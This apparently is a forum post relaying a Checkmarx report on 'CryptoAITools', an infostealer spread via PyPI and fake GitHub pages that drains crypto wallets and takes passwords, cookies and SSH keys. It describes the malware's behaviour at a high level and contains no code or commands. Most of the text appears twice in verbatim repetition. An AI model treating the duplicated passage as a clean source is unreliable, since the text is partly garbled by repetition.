Man
Professional
- Messages
- 3,059
- Reaction score
- 585
- Points
- 113
Cybersecurity researchers have uncovered a new piece of malware called 'CryptoAITools' disguised as a cryptocurrency trading tool. The program is designed to steal data and drain users' cryptocurrency wallets. It was distributed through popular repositories such as the Python Package Index (PyPI) and fake GitHub pages, where it was downloaded more than 1300 times before being completely removed.
Experts from Checkmarx reported that the malware is activated immediately after installation, targeting Windows and macOS operating systems. Users see a false GUI that distracts attention while the program steals data in the background. Malicious code hidden in the "__init__.py" file automatically detects the device's operating system and downloads the appropriate version of the program for further execution.
The program downloads additional malicious components from the fake "coinsw[.]app", which allegedly offers a cryptocurrency trading service. This approach allows hackers not only to hide their actions, but also to constantly update the program's functions by modifying the downloaded malicious files.
The key feature of the malware is a fake installation that masks the process of data theft. Malicious code actively collects confidential information, including data from cryptocurrency wallets (Bitcoin, Ethereum, etc.), saved passwords, cookies, browser history, data from cryptocurrency extensions, SSH keys, and files containing financial information. In the case of macOS devices, the program also collects notes from the Apple Notes and Stickies applications, and then sends all the information to the third-party gofile[.]io by deleting local copies.
Checkmarx also revealed that a similar malware is being distributed via GitHub under the guise of a "Meme Token Hunter Bot" bot that purports to be powered by artificial intelligence and tracks meme tokens on the Solana blockchain. A Telegram channel is also supported, where authors offer subscriptions and technical support for potential victims.
The multi-platform approach allows attackers to reach a wider audience, which poses serious risks to many cryptocurrency holders, expanding the scope of the attack and making it more difficult to detect.
Source
Experts from Checkmarx reported that the malware is activated immediately after installation, targeting Windows and macOS operating systems. Users see a false GUI that distracts attention while the program steals data in the background. Malicious code hidden in the "__init__.py" file automatically detects the device's operating system and downloads the appropriate version of the program for further execution.
The program downloads additional malicious components from the fake "coinsw[.]app", which allegedly offers a cryptocurrency trading service. This approach allows hackers not only to hide their actions, but also to constantly update the program's functions by modifying the downloaded malicious files.
The key feature of the malware is a fake installation that masks the process of data theft. Malicious code actively collects confidential information, including data from cryptocurrency wallets (Bitcoin, Ethereum, etc.), saved passwords, cookies, browser history, data from cryptocurrency extensions, SSH keys, and files containing financial information. In the case of macOS devices, the program also collects notes from the Apple Notes and Stickies applications, and then sends all the information to the third-party gofile[.]io by deleting local copies.
Checkmarx also revealed that a similar malware is being distributed via GitHub under the guise of a "Meme Token Hunter Bot" bot that purports to be powered by artificial intelligence and tracks meme tokens on the Solana blockchain. A Telegram channel is also supported, where authors offer subscriptions and technical support for potential victims.
The multi-platform approach allows attackers to reach a wider audience, which poses serious risks to many cryptocurrency holders, expanding the scope of the attack and making it more difficult to detect.
Source
